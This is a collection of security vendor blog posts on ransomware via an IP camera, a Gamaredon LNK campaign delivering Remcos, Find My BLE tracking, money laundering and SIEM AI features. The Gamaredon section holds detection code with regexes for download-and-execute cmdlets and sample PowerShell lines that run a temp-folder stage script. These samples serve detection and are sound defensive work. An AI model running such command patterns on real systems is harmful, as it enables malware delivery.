  • Due to its severely outdated firmware, the device was vulnerable to remote exploitation, which granted attackers shell access and the ability to execute commands.
  • The camera ran a lightweight Linux build capable of executing standard binaries for this operating system. Coincidentally, Akira’s arsenal contained a Linux-based encryption tool.
  • This specialized device lacked — and likely was incapable of supporting — an EDR agent or any other security controls to detect malicious activity.

The attackers were able to install their malware on the camera, and used the device as the foothold for encrypting the organization’s servers.

How to avoid being the next victim

The IP camera incident vividly illustrates certain principles of targeted cyberattacks, and provides insight into effective countermeasures. Here’s a ranking of the countermeasures, from the easiest to the most complex:

  • Limit access to specialized network devices and their permissions. A major factor in this attack was the IP camera’s overly permissive access to the file servers. These devices should reside within an isolated subnet. If that’s not feasible, they should be given the fewest possible permissions to communicate with other computers. For example, write-access should be restricted to a single folder on a single specific server where video recordings are stored. And access to the camera and this folder should be restricted to workstations used only by security and other authorized personnel. While implementing these restrictions may be more challenging for other specialized devices (such as printers), it’s readily achievable with cameras.
  • Deactivate non-essential services and default accounts on smart devices, and change default passwords.
  • Use an EDR solution across all servers, workstations, and other compatible devices. The selected solution must be capable of detecting anomalous server activity, such as remote encryption attempts via SMB.
  • Extend vulnerability and patch management programs to include all smart devices and server software. Start by conducting a detailed inventory of such devices.
  • Where feasible, implement monitoring, such as telemetry forwarding to a SIEM system, even on specialized devices where EDR deployment isn’t possible: routers, firewalls, printers, video surveillance cameras, and similar devices.
  • Consider transitioning to an XDR-class solution, which combines network and host monitoring with anomaly-detection technologies and tools for manual and automatic incident response.

Kaspersky official blog – ​Read More

Beers with Talos: Year in Review episode

Joe, Hazel, Bill and Dave break down Talos’ Year in Review 2024 and discuss how and why cybercriminals have been leaning so heavily on attacks that are rooted in stealth and simplicity.

The team also provide insights into some of the topics of the report, including the top-targeted vulnerabilities of the year, network-based attacks, adversary toolsets, identity attacks, multi-factor authentication (MFA) abuse, ransomware and AI-based attacks. 

Listen below:

For the full report, head to blog.talosintelligence.com/2024yearinreview

Cisco Talos Blog – ​Read More

Available now: 2024 Year in Review

Welcome to Cisco Talos’ 2024 Year in Review, available for download now. This report is powered by threat telemetry from over 46 million global devices across 193 countries and regions, amounting to more than 886 billion security events per day.  

Explore key insights in topics including the top targeted vulnerabilities of the year, network-based attacks, email threats, adversary toolsets, identity attacks, multi-factor authentication (MFA) abuse, ransomware and AI-based attacks. With Talos’ informed analysis and recommendations, you can strategically prioritize your defenses to stay ahead in 2025. 

 

2024’s Threat Actor Playbook: Stealth and Simplicity 

This year, cybercriminals leaned heavily on stealth and efficiency, favoring straightforward techniques over complex malware and zero-day exploits. Here’s more that stood out: 

  • Identity-based attacks were particularly noteworthy, accounting for 60% of Cisco Talos Incident Response cases. 
  • Some of the top-targeted network vulnerabilities affect end-of-life (EOL) devices and therefore have no available patches, despite still being actively targeted by threat actors. 
  • Ransomware actors overwhelmingly leveraged valid accounts for initial access in 2024, with this tactic appearing in almost 70% of cases. They also targeted education entities more than any other sector in 2024, a trend in line with previous years.  
  • Based on Cisco Duo data, identity and access management (IAM) applications were most frequently targeted in MFA attacks, accounting for nearly a quarter of related incidents.  
  • Threat actor use of AI and machine learning largely fell short of industry projections, with actors relying on these technologies to enhance their techniques rather than aid in the creation of new ones. 

Want some quick insights? Here’s a two-minute overview of key findings: 

Stay informed 

Download Talos’ 2024 Year in Review today, and bookmark our landing page to access forthcoming exclusive interviews with Talos experts, videos, podcasts and more. 

Cisco Talos Blog – ​Read More

Gamaredon campaign abuses LNK files to distribute Remcos backdoor

  • Cisco Talos is actively tracking an ongoing campaign, active since at least November 2024, that targets users in Ukraine with malicious LNK files which run a PowerShell downloader. 
  • The file names use Russian words related to the movement of troops in Ukraine as a lure. 
  • The PowerShell downloader contacts geo-fenced servers located in Russia and Germany to download the second stage Zip file containing the Remcos backdoor. 
  • The second stage payload uses DLL side loading to execute the Remcos payload. 
  • Talos assesses with medium confidence that this activity is associated with the Gamaredon threat actor group. 

Phishing campaign using the invasion of Ukraine as a theme 

The invasion of Ukraine is a common theme used by the Gamaredon group in their phishing campaigns and this campaign continues the use of this technique. The actor distributes LNK files compressed inside ZIP archives, usually disguising the file as an Office document and using names that are related to the invasion.  

Although Talos was not able to pinpoint the exact method by which these files are distributed, it is likely that Gamaredon continues to send phishing e-mails with either the ZIP file directly attached to it or containing a URL link to download the file from a remote host.  

Below are some examples of file names used in this campaign: 

Original Name | Translation 
3079807576 (Шашило О.В)/ШАШИЛО Олександр Віталійович.docx.lnk | 3079807576 (Shashilo O.V)/SHASHILO Oleksandr Vitaliyovich.docx.lnk 
3151721177 (Рибак С.В)/РИБАК Станіслав Вікторович.docx.lnk | 3151721177 (Rybak S.V)/RYBAK Stanislav Viktorovich.docx.lnk 
3407607951 (Жолоб В.В)/ЖОЛОБ Владислав Вікторович.docx.lnk | 3407607951 (Zholob V.V)/ZHOLOB Vladislav Viktorovich.docx.lnk 
3710407173 (Гур’єв П.А)/ГУР’ЄВ Павло Андрійович.docx.lnk | 3710407173 (Gur’ev P.A)/GUR’EV Pavlo Andriyovich.docx.lnk 
Вероятное расположение узлов связи, установок РЭБ и расчетов БПЛА противника. ЮГ КРАСНОАРМЕЙСКА.docx.lnk | Probable location of communication nodes, electronic warfare installations and enemy UAV calculations. SOUTH OF THE RED ARMY.docx.lnk 
ГУР’ЄВ Павло Андрійович.docx.lnk | GUR’EV Pavlo Andriyevich.docx.lnk 
Координаты взлетов противника за 8 дней (Красноармейск).xlsx.lnk | Coordinates of enemy takeoffs for 8 days (Krasnoarmeysk).xlsx.lnk 
Позиции противника запад и юго-запад.xlsx.lnk | Positions of the enemy west and southwest.xlsx.lnk 
РИБАК Станіслав Вікторович.docx.lnk | RYBAK Stanislav Viktorovich.docx.lnk 
ШАШИЛО Олександр Віталійович.docx.lnk | SHASHILO Oleksandr Vitaliyevich.docx.lnk 

The translation for these names shows the intent of this campaign in using a war-related theme. We can see some of the files use names of Russian or Ukrainian agents, as well as names alluding to troop movements in the region of conflict. 

These files contain metadata indicating that only two machines were used in creating the malicious shortcut files. As we mentioned in a previous blog, Gamaredon tends to use a short list of machines when creating the LNK files for their campaigns, and the ones used in this campaign were previously seen by Talos in incidents related to this threat group. 

The LNK files contain PowerShell code used to download and execute the next stage payload, as well as a decoy file which is shown to the user after the infection occurs as a way to disguise the compromise.  

The PowerShell code uses the cmdlet Get-Command to indirectly execute the functions to download and execute the payload, which could be an attempt to bypass string-based detection by antivirus solutions.  

The servers used in this campaign are based out of Germany and Russia, and at the time of our assessment, all of them return HTTP error 403 when attempting to download the payload files.  

That indicates that either the files were taken offline, or access to the file is being restricted. Gamaredon is known to restrict access to their payload servers only to victims located in Ukraine. We have found evidence in public sample databases that these servers were still hosting the files for specific regions while returning access denied errors in our tests, like this sample available in the “Any.run” public sandbox: 

Network infrastructure associated with Campaign 

The servers used in this campaign are mostly hosted by two Internet Service Providers (ISPs), GTHost and HyperHosting. 

These servers are used to distribute the payload and the decoy document, but Talos found evidence of at least one server being used as the Command and Control (C2) server for the Remcos backdoor. 

We have also found an interesting artifact in the DNS resolution for some of these servers. Even though all the communication with these servers is done directly via the IP address, the reverse DNS record for some of these IPs shows an invalid entry that is quite distinctive: 

Figure: Reverse DNS resolution for Gamaredon’s campaign. Modeled using Crime Mapper (by @UK_Daniel_Card)

While this doesn’t necessarily mean the attackers manually changed these records, it did help uncover at least two additional IPs matching the characteristics of the other servers in this campaign. 

DLL sideloading used to load Remcos backdoor 

Gamaredon has previously been known to use custom scripts and tools in their attack chains, but Talos has observed the use of Remcos backdoor as an alternative tool in their campaigns. 

Once the ZIP payload is downloaded from the servers, it is extracted to the %TEMP% folder and executed. The binary that is executed is a clean application which in turn loads the malicious DLL via DLL sideloading. That DLL is a loader which decrypts and executes the final Remcos payload from encrypted files found within the ZIP. 

The PowerShell files we observed downloading the ZIP files contain hints of various applications being abused for DLL side loading, and they contain a mix of clean and malicious files: 

  • DefenderUpdate/DPMHelper.exe 
  • DefenderUpdate/DZIPR.exe 
  • DefenderUpdate/IDRBackup.exe 
  • DefenderUpdate/IUService.exe 
  • DefenderUpdate/madHcCtrl.exe 
  • DefenderUpdate/palemoon.exe 
  • Drvx64/Compil32.exe 
  • Drvx64/IsCabView.exe 
  • Drvx64/TiVoDiag.exe 
  • Drvx64/WiseTurbo.exe 
  • SecurityCheck/Mp3tag.exe 
  • SysDrive/AcroBroker.exe 
  • SysDrive/DPMHelper.exe 
  • SysDrive/IsCabView.exe 
  • SysDrive/palemoon.exe 
  • SysDrive/SbieSvc.exe 
  • SysDrive/steamerrorreporter64.exe 
  • SysDrive/TiVoDiag.exe 
  • SysDrive/vmhost.exe 

We can see in the previously mentioned sample downloaded by “Any.run” that it contains the clean application TivoDiag.exe, as well as two DLLs. The file “mindclient.dll” is the malicious DLL which is loaded by “TivoDiag.exe” during execution. 
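Detection logic for the two tradecraft points above (Get-Command indirection in the LNK’s PowerShell, and DLL sideloading by the listed clean executables run from %TEMP%), as an added example that is not Talos code. The log records are constructed, and the record shapes (script-block text, process image path plus loaded DLL path) are assumptions about your own telemetry; the Get-Command pattern is a generalization, not a copy of the campaign’s exact syntax.

```python
"""Detection helpers for Get-Command indirection and temp-folder DLL sideloading.

Added example, not Talos code; all log records below are constructed and the
record shapes are assumptions about the reader's telemetry.
"""
import fnmatch
import ntpath
import re
from typing import List

# Cmdlets/aliases a downloader stage needs. Kept as names so that a wildcard
# handed to Get-Command (e.g. 'i*x') can be expanded the way PowerShell would.
SENSITIVE_CMDLETS = [
    "invoke-webrequest", "iwr", "invoke-restmethod", "irm",
    "invoke-expression", "iex", "start-process", "saps", "expand-archive",
]

# `& (Get-Command <name>) args` / `&(gcm '<pattern>') args`: the cmdlet name is
# never a direct token of the call, which is what defeats naive string matching.
GET_COMMAND_INDIRECTION = re.compile(
    r"&\s*\(\s*(?:get-command|gcm)\s+(?:-name\s+)?['\"]?(?P<target>[\w*?-]+)['\"]?\s*\)",
    re.IGNORECASE,
)


def flag_script_block(text: str) -> List[str]:
    """Return the sensitive cmdlets reachable through Get-Command indirection in
    one PowerShell script block (empty list means nothing matched)."""
    hits = set()
    for match in GET_COMMAND_INDIRECTION.finditer(text):
        pattern = match.group("target").lower()
        hits.update(n for n in SENSITIVE_CMDLETS if fnmatch.fnmatchcase(n, pattern))
    return sorted(hits)


# Clean host executables named in the downloader scripts (from the list above).
ABUSED_HOST_BINARIES = {
    "dpmhelper.exe", "dzipr.exe", "idrbackup.exe", "iuservice.exe", "madhcctrl.exe",
    "palemoon.exe", "compil32.exe", "iscabview.exe", "tivodiag.exe", "wiseturbo.exe",
    "mp3tag.exe", "acrobroker.exe", "sbiesvc.exe", "steamerrorreporter64.exe", "vmhost.exe",
}
TEMP_MARKERS = ("\\appdata\\local\\temp\\", "\\windows\\temp\\")


def flag_image_load(image: str, loaded: str) -> bool:
    """True when one of the abused clean executables runs from a temp folder and
    loads a DLL that sits beside it: the sideloading pattern described above."""
    image_l, loaded_l = image.lower(), loaded.lower()
    return (
        ntpath.basename(image_l) in ABUSED_HOST_BINARIES
        and any(marker in image_l for marker in TEMP_MARKERS)
        and loaded_l.endswith(".dll")
        and ntpath.dirname(image_l) == ntpath.dirname(loaded_l)
    )


def scan_image_loads(records) -> List[int]:
    """Indices of (image, loaded_dll) records that match the sideloading rule."""
    return [i for i, (image, loaded) in enumerate(records) if flag_image_load(image, loaded)]


# Constructed samples (not from real telemetry).
SAMPLE_SCRIPT_BLOCKS = [
    "& (Get-Command Expand-Archive) $env:TEMP\\DefenderUpdate.zip $env:TEMP",
    "Get-ChildItem -Path C:\\Users -Recurse",
    "&(gcm 'i*x') (Get-Content $env:TEMP\\stage.ps1 -Raw)",
]
SAMPLE_IMAGE_LOADS = [
    ("C:\\Users\\u\\AppData\\Local\\Temp\\SysDrive\\TiVoDiag.exe",
     "C:\\Users\\u\\AppData\\Local\\Temp\\SysDrive\\mindclient.dll"),   # flagged
    ("C:\\Program Files\\TiVo\\TiVoDiag.exe",
     "C:\\Program Files\\TiVo\\mindclient.dll"),                        # not in temp
    ("C:\\Users\\u\\AppData\\Local\\Temp\\SysDrive\\TiVoDiag.exe",
     "C:\\Windows\\System32\\kernel32.dll"),                            # system DLL
]

if __name__ == "__main__":
    for block in SAMPLE_SCRIPT_BLOCKS:
        print(flag_script_block(block) or "clean", "<-", block)
    print("sideloading records:", scan_image_loads(SAMPLE_IMAGE_LOADS))
```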

The payload binary is a typical Remcos backdoor which is injected into Explorer.exe. It communicates with the C2 server 146[.]185[.]233[.]96 on port 6856: 

Coverage 

Ways our customers can detect and block this threat are listed below. 

 

Cisco Secure Endpoint (formerly AMP for Endpoints) is ideally suited to prevent the execution of the malware detailed in this post. Try Secure Endpoint for free here. 

Cisco Secure Email (formerly Cisco Email Security) can block malicious emails sent by threat actors as part of their campaign. You can try Secure Email for free here. 

Cisco Secure Firewall (formerly Next-Generation Firewall and Firepower NGFW) appliances such as Threat Defense Virtual, Adaptive Security Appliance and Meraki MX can detect malicious activity associated with this threat. 

Cisco Secure Network/Cloud Analytics (Stealthwatch/Stealthwatch Cloud) analyzes network traffic automatically and alerts users of potentially unwanted activity on every connected device. 

Cisco Secure Malware Analytics (Threat Grid) identifies malicious binaries and builds protection into all Cisco Secure products. 

Cisco Secure Access is a modern cloud-delivered Security Service Edge (SSE) built on Zero Trust principles. Secure Access provides seamless, transparent and secure access to the internet, cloud services or private applications no matter where your users work. Please contact your Cisco account representative or authorized partner if you are interested in a free trial of Cisco Secure Access. 

Umbrella, Cisco’s secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs and URLs, whether users are on or off the corporate network.  

Cisco Secure Web Appliance (formerly Web Security Appliance) automatically blocks potentially dangerous sites and tests suspicious sites before users access them.  

Additional protections with context to your specific environment and threat data are available from the Firewall Management Center. 

Cisco Duo provides multi-factor authentication for users to ensure only those authorized are accessing your network.  

Open-source Snort Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on Snort.org. 

Snort SIDs for this threat:  

Snort 2: 64707, 64708 

Snort 3: 301171 

Indicators of Compromise 

IOCs for this threat can be found in our GitHub repository here.    

Cisco Talos Blog – ​Read More

ANY.RUN Wins Globee Awards 2025 for Outstanding Threat Detection and Response

The Globee Awards is an annual competition celebrating companies in various fields, including technology-related businesses, since 2003. This year, the winners were announced on March 13, and ANY.RUN is one of them! We earned silver in the Outstanding Threat Detection and Response category. 

Thank You! 

It’s a pleasure to share the news with our lovely community and once again express gratitude to everyone who joined us on the adventure to a safer future and better tools for cybersecurity professionals. 

A new milestone on this journey was achieved by our flagship product, ANY.RUN Interactive Sandbox. As part of the awards, it was evaluated by a panel consisting of over 1,500 experts from around the world. Based on their scores and detailed reviews, the Sandbox was recognized as one of the best cybersecurity solutions.  

The Value We Bring  

Among the advantages of our product, the following were highlighted as especially beneficial to businesses: 

  • Real-time analysis and constant updates: we always keep our users up-to-date on emerging threats and give them the opportunity to analyze potentially dangerous files in seconds. 
  • Safety of sensitive data: our private mode allows you to upload any info that must stay confidential. No one but you will have access to it. ANY.RUN fully complies with SOC 2 and GDPR.  
  • Lowering financial risks: with ANY.RUN’s sandbox, SOC specialists can react to threats fast, thus minimizing harmful consequences or avoiding them altogether. As a result, the company budget won’t suffer. 

We work hard to make ANY.RUN Interactive Sandbox a top-notch solution to your malware analysis needs and are happy to see that our efforts were recognized by the award committee. 

Cybersecurity at Globee Awards 2025  

San Madan, President of the Globee Awards, congratulated us and other winners in our category, noting the importance of fighting cyber threats: 

We are excited to celebrate the remarkable achievements of organizations, cybersecurity professionals, and innovators who are influencing the future of cybersecurity. These winners demonstrate resilience, innovation, and a dedication to safeguarding businesses and individuals from the evolving threats in the cyber landscape.

About ANY.RUN

ANY.RUN helps more than 500,000 cybersecurity professionals worldwide. Our interactive sandbox simplifies malware analysis of threats that target both Windows and Linux systems. Our threat intelligence products, TI Lookup, YARA Search, and Feeds, help you find IOCs or files to learn more about the threats and respond to incidents faster.

ANY.RUN’s Cybersecurity Blog – ​Read More

Protecting Android, Windows, and Linux devices against being tracked via the Find My network | Kaspersky official blog

AirTags are a popular tracking device used by anyone from forgetful key owners to those with malicious intent, such as jealous spouses and car thieves. Using AirTags for spying is simple: a tag is discreetly placed on the target to allow their movements to be conveniently monitored using Apple Find My. We’ve even added protection from AirTag-based tracking to our products for Android.

But a recent study by security researchers has surprisingly found that remote tracking doesn’t even depend on buying an AirTag or ever being physically near the target. If you manage to sneak special malware onto someone’s Windows, Android, or Linux device (like a computer or phone), it could use the device’s Bluetooth to send out a signal that nearby Apple devices would think is coming from an AirTag. Essentially, for Apple devices, the infected phone or computer effectively becomes an oversized AirTag – trackable via the Find My network, which boasts over a billion Apple phones and tablets.

Anatomy of the attack

The attack exploits two features of the Find My technology.

Firstly, this network uses end-to-end encryption – so participants don’t know whose signals they’re relaying. To exchange information, an AirTag and its owner’s phone rely on a pair of cryptographic keys. When a lost AirTag broadcasts its “callsigns” via Bluetooth, Find My network “detectors” (that is, any Apple device with Bluetooth and internet access, regardless of who owns it) simply transmit the AirTag’s geolocation data to Apple servers. The data is encrypted with the lost AirTag’s public key.

Then, any device can ask for the encrypted location data from the server. And because it’s encrypted, Apple doesn’t know who the signal belongs to, or which device asked for it. The crucial point here is that one can only decrypt the data and find out both whose AirTag it is and its exact location by having the corresponding private key. Therefore, this data is only useful to the owner of the smartphone paired with this AirTag.

Another feature of Find My is that detectors don’t verify whether the location signal indeed originated with an Apple device. Any devices that support Bluetooth Low Energy (BLE) can broadcast it.

To exploit these features, the researchers came up with the following method:

  1. They install malware on a computer, phone, or some other device running Android, Windows, or Linux, and check the Bluetooth adapter address.
  2. The attackers’ server receives the information and uses powerful video cards to generate a pair of encryption keys specific to the device’s Bluetooth address and compatible with Apple’s Find My
  3. The public key is sent back to the infected device, and the malware then starts transmitting a Bluetooth message that mimics AirTag signals and includes this key.
  4. Any nearby Apple device connected to the internet receives the Bluetooth message and relays it to the Find My
  5. The attackers’ server uses the private key to request the location of the infected device from Find My and decrypt the data.
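The coupling between the advertised key and the Bluetooth address in steps 1 to 3 above, shown concretely as an added example that is not from the Kaspersky post: a sniffer-side classifier that recognises Find My “Offline Finding” advertisements and rebuilds the advertised public key from the payload plus the advertising address. The byte layout goes beyond what this page states and is taken from the public OpenHaystack documentation and the “Who Can Find My Devices?” paper (Heinrich et al., 2021); treat it as an assumption to verify against those sources. All frames below are constructed; capturing them needs a BLE adapter and is out of scope.

```python
"""Classifier for Apple Find My "Offline Finding" BLE advertisements, for frames
captured by a BLE sniffer. Added example, not code from the Kaspersky post.

Byte layout (an assumption to verify against OpenHaystack / Heinrich et al. 2021):
  AD structure 0xFF, company 0x004C, sub-type 0x12, length 0x19, then
  status(1) | public key bytes 6..27 (22) | top two bits of key byte 0 (1) | hint(1).
Key bytes 0..5 are carried in the advertising address (MSB first as printed),
whose top two bits are forced to 1 by the random-static address format.
"""
from dataclasses import dataclass
from typing import List, Optional, Tuple

APPLE_COMPANY_ID = b"\x4c\x00"   # Bluetooth SIG company ID 0x004C, little-endian
OFFLINE_FINDING_TYPE = 0x12      # Apple sub-type for Offline Finding frames
OFFLINE_FINDING_LEN = 0x19       # 25 bytes follow: status, 22 key bytes, bits, hint


@dataclass
class OfflineFindingFrame:
    address: bytes      # 6-byte advertising address (random static type)
    status: int         # status byte (battery level and similar flags)
    public_key: bytes   # reconstructed 28-byte P-224 public key (x-coordinate)
    hint: int


def manufacturer_data(adv: bytes) -> Optional[bytes]:
    """Walk the AD structures of a raw advertising payload and return the
    manufacturer-specific data (AD type 0xFF), or None if absent or malformed."""
    i = 0
    while i < len(adv):
        length = adv[i]
        if length == 0 or i + 1 + length > len(adv):
            return None                      # truncated or padded frame
        if adv[i + 1] == 0xFF:
            return adv[i + 2 : i + 1 + length]
        i += 1 + length
    return None


def parse_offline_finding(address: bytes, adv: bytes) -> Optional[OfflineFindingFrame]:
    """Recognise an Offline Finding frame and rebuild the advertised public key.

    Only 22 of the 28 key bytes are in the payload; bytes 0..5 are the address.
    This is why a key cannot be chosen freely for a given adapter address: its
    first bytes must match that address, which is the search step 2 describes.
    """
    mfg = manufacturer_data(adv)
    if mfg is None or len(mfg) != 4 + OFFLINE_FINDING_LEN or len(address) != 6:
        return None
    if (mfg[:2] != APPLE_COMPANY_ID or mfg[2] != OFFLINE_FINDING_TYPE
            or mfg[3] != OFFLINE_FINDING_LEN):
        return None
    status, key_tail, top_bits, hint = mfg[4], mfg[5:27], mfg[27], mfg[28]
    if top_bits > 0b11:
        return None
    first = (address[0] & 0x3F) | (top_bits << 6)   # restore the two masked bits
    return OfflineFindingFrame(address, status, bytes([first]) + address[1:] + key_tail, hint)


def address_matches_key(address: bytes, public_key: bytes) -> bool:
    """Consistency check: the advertising address must equal key bytes 0..5 with
    the two high bits of byte 0 set."""
    return len(public_key) == 28 and address == bytes([public_key[0] | 0xC0]) + public_key[1:6]


def inventory(scan: List[Tuple[str, str]]) -> List[Tuple[str, str]]:
    """From (address_hex, adv_hex) sniffer records, list every Offline Finding
    beacon as (address, public_key_hex). Correlating these addresses against an
    asset inventory of your own Bluetooth adapters is what makes this a detection."""
    found = []
    for addr_hex, adv_hex in scan:
        addr, adv = bytes.fromhex(addr_hex), bytes.fromhex(adv_hex)
        frame = parse_offline_finding(addr, adv)
        if frame is not None and address_matches_key(addr, frame.public_key):
            found.append((addr_hex, frame.public_key.hex()))
    return found


# Constructed sniffer records (not real captures; the key is the byte pattern
# 0x81, 0x02 .. 0x1c, not a genuine device key).
SAMPLE_SCAN = [
    ("c10203040506",
     "020106" "1eff4c00121910"
     "0708090a0b0c0d0e0f101112131415161718191a1b1c" "0200"),   # Offline Finding
    ("d1aabbccddee", "06ff4c0010050a"),   # another Apple manufacturer frame, ignored
    ("5a0102030405", "05ff5900aabb"),     # non-Apple manufacturer frame, ignored
]

if __name__ == "__main__":
    for address, key in inventory(SAMPLE_SCAN):
        print(f"Offline Finding beacon from {address}: key {key}")
```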

How well does the tracking work?

The more Apple devices nearby and the slower the victim’s movement, the better the accuracy and speed of the location tracking. In typical urban environments like homes or offices, the location is typically pinpointed within six to seven minutes and with an accuracy of around three meters. Even in extreme situations, such as being on an airplane, tracking can still occur because internet access is now widely available on flights. The researchers obtained 17 geolocation points throughout a 90-minute flight, allowing them to reconstruct the aircraft’s flight path quite accurately.

Naturally, the success of the attack hinges on whether the victim can be infected with malware, and the details are slightly different depending on the platform. On Linux devices, the attack only requires infecting the victim’s gadget due to the specific Bluetooth implementation. By contrast, Android and Windows employ Bluetooth address randomization, meaning the attacker needs to infect two nearby Bluetooth devices: one as the tracking target (the one that mimics an AirTag), and another to obtain its adapter address.

The malicious application needs Bluetooth access, but this isn’t hard to get. Many common app categories – like media players, file sharing tools, and even payment apps – often have legitimate reasons to request it. It’s likely that a convincing and functional bait application will be created for this type of attack, or even that an existing application will be trojanized. The attack requires neither administrative permissions nor root access.

Importantly, we’re not just talking about phones and computers: the attack is effective across a range of devices – including smart TVs, virtual-reality glasses, and other household appliances – as Android and Linux are common operating systems in many of them.

Another key part of the attack involves calculating cryptographic keys on the server. Due to the complexity of this operation – which requires leasing hardware with modern video cards – the cost of generating a key for a single victim is estimated at around $2.2. For this reason, we find mass-tracking scenarios that target, say, visitors inside a shopping center, to be unlikely. However, targeted attacks at this price point are accessible to virtually anyone, including scammers or nosy co-workers and spouses.

Apple’s response

The company patched the Find My network vulnerability in December 2024 in iOS 18.2, visionOS 2.2, iPadOS 17.7.3 (for older devices) and 18.2 (for newer ones), watchOS 11.2, tvOS 18.2, macOS Ventura 13.7.2, macOS Sonoma 14.7.2, and macOS Sequoia 15.2. Unfortunately, as is often the case with Apple, the details of the updates have not been disclosed. The researchers emphasize that this tracking method will remain technically feasible until all Apple users update to at least the above versions, though fewer devices will be able to report a tracked device’s location. And it’s not impossible that the Apple patch could be defeated by another engineering trick.

How to protect yourself from the attack

  • Turn off Bluetooth when you’re not using it if your device has the option.
  • When installing apps, stick to trusted sources only. Verify that the app has been around for a long time, and has many downloads and a high rating in its latest version.
  • Only grant Bluetooth and location access to apps if you’re certain you need those features.
  • Regularly update your device: both the OS and main apps.
  • Make sure you have comprehensive malware protection enabled on all your devices. We recommend Kaspersky Premium.

Besides this rather unusual and as-yet-unseen-in-the-wild tracking method, there are numerous other ways your location and activities can be tracked. What methods are being used to spy on you? Read these for the details:

… and other posts.

Kaspersky official blog – ​Read More

Money Laundering 101, and why Joe is worried

Welcome to this week’s edition of the Threat Source newsletter. 

Howdy friends! One of the things I learned early on in cyber security is that crime does, in fact, pay. It can pay very well, actually. If it didn’t, we wouldn’t have ransomware cartels raking in obscene amounts of money year after year. Ransomware victims pay ransoms with cryptocurrency — typically Bitcoin. A criminal who has their ill-gotten BTC gains then needs to introduce it into a banking system that lets them spend that cryptocurrency with no questions asked.  

You might be unsurprised to learn that that isn’t as easy as it sounds, but it’s also not a new problem. In the 1980s, South American drug cartels had a similar issue. They were making obscene amounts of money and had massive piles of cash. However, one cannot show up and start dropping massive amounts of money buying very expensive things without drawing legal attention. Plus, it turns out, cash was the preferred way to bribe corrupt officials. As a result, they found legal and banking loopholes, and less than reputable financial practices in the U.S. and in other countries to inject ill-gotten money into a legitimate banking system where they could access the funds.  

This is called money laundering, and it is at the heart of every successful organized crime organization. Money Laundering 101 is done in three basic steps: Placement, Layering, and Integration.  

  1. Placement: You need to get your money into the financial system(s). 
  2. Layering: You need to move the money around so it’s harder to trace and to link it to the crime.  
  3. Integration: Now that the connection to the crime is obfuscated, you can spend that money. You can invest it, buy expensive cars, or whatever. That money is now in someone else’s pocket. I used to joke that Ferrari dealerships don’t exactly accept cryptocurrency, but it turns out that joke is now on me. More and more businesses now accept cryptocurrency as a direct means of payment it seems.  

We often think of the crime of ransomware attacks at the point of impact and victimization, but rarely do we think of the reverse — the money that is paid out that flows back into the cartel and its affiliates. Cryptocurrency is fantastic for money laundering. It lags far behind regulatory standards, is largely anonymous, and can be “mixed” and directed to decentralized exchanges where Know Your Customer (KYC) and Anti-Money Laundering (AML) controls are not applied.  

So why am I bringing this up? Well, law enforcement attacking money laundering infrastructure really works. If you can impact how criminals launder their money, you put the brakes on the crime itself happening. After all, what good are the spoils of crime if you can’t do anything with them? 

My fear is that regulatory climates have shifted, which will allow laundering to more easily happen. Time will tell if I’m right, and I don’t want to be.

The one big thing 

I’m a huge fanboy for clever evasion tactics. Cascading Style Sheets (CSS) evasion tactics in spam emails are just a wicked cool trick. Game knows game, and I have to say, this is super smart. Spam filters play a constant cat and mouse game against adversaries. It goes to show that the threat actors are always innovating neat tricks to exploit victims. 

Why do I care? 

Spam emails account for a massive threat footprint, especially in enterprise email security. Any attack that sneaks malicious spam emails through a spam filter is worth paying attention to. 

So now what? 

Knowing is half the battle. Time to look at your email defenses and shore them up. Consider an email proxy service or something similar to help augment your email threat defense.

Top security headlines of the week 

Airport outages: Malaysia PM says country rejected $10 million ransom demand (The Record) 

Satellites! I am an absolute sucker for space hacking. ENISA released a great guide on securing commercial space assets. (ENISA)  

One-click phishing attacks: Google hastily patched a Chrome zero-day vulnerability exploited by an APT. (Dark Reading) 

Can’t get enough Talos? 

  • Patch Tuesday was a doozy this time. Check out our blog post here. 
  • Also, keep your eyes peeled: Talos’ 2024 Year in Review will be available for download on Monday, Mar. 31. 

Upcoming events where you can find Talos 

  • RSA (April 28 – May 1, 2025) San Francisco, CA 
  • PIVOTcon (May 7 – 9) Malaga, Spain 
  • CTA TIPS 2025 (May 14 – 15, 2025) Arlington, VA 
  • Cisco Live U.S. (June 8 – 12, 2022) San Diego, CA

Most prevalent malware files from Talos telemetry over the past week  

Cisco Talos Blog – ​Read More

AI technologies in Kaspersky SIEM | Kaspersky official blog

It’s a rare company these days that doesn’t boast about using artificial intelligence (AI). And often no explanation is forthcoming as to why AI is needed or, more importantly, how it’s implemented — just the mere presence of AI, it seems, is enough to make a product more valuable, innovative and high-tech. Kaspersky advocates a different approach: we don’t just say “we use AI”, but explain exactly how we deploy machine learning (ML) and AI technologies in our solutions. It’d take too long to list all our AI technologies in a single post given that we have an entire expertise center — Kaspersky AI Technology Research — that deals with all aspects of AI. So my sole focus here will be on those technologies that make life easier for SIEM analysts working with the Kaspersky Unified Monitoring and Analysis Platform.

SIEM AI Asset Risk Scoring

In traditional systems, one of the most resource-intensive tasks of the SIEM analyst is prioritizing alerts — especially if the system has just been installed and works out of the box with default correlation rules not yet fine-tuned to the infrastructure of a specific company. Big data analytics and AI systems can help here. Armed with SIEM AI Asset Risk Scoring, monitoring and response teams can prioritize alerts and prevent potential damage. The module assesses asset risks by analyzing historical data and prioritizing incoming alerts, which speeds up triage and helps generate hypotheses that can be used for proactive searches.

Based on information about activated correlation rule chains, SIEM AI Asset Risk Scoring lets you build patterns of normal activity on endpoints. Then, by comparing daily activity with these patterns, the module identifies anomalies (for example, sudden traffic spikes or multiple service requests) that may signal a real incident and prompt the analyst to take a deeper look into these alerts. This way, the problem is detected early, before any damage is done.

AI-Powered OSINT IoCs

Analysts working with the Kaspersky Unified Monitoring and Analysis Platform also have the option to use additional contextual information from open sources through the Kaspersky Threat Intelligence Portal. After the latest update, the portal now provides access to threat intelligence collected using a generative AI model.

It works as follows: let’s say you’ve found a suspicious file during a threat hunt. You can take this file’s hash and look it up on the site, and if someone else has already encountered it during an incident investigation and published something about it, the technology will instantly show you indicators of compromise (IoCs) and key facts about the threat. Without such an automation system, it can take the analyst many hours to find and review this information — especially if there are lots of materials and they’re written in different languages. Our system, built on an internal LLM, can automate this process: it analyzes all reports and mentions of the threat whatever the language, extracts the essence, and presents a summary: the nature of the threat, the date it was first detected, cybercriminal groups associated with it, industries most often targeted using the file, and so on. This saves the analyst an enormous amount of time on searching and researching.

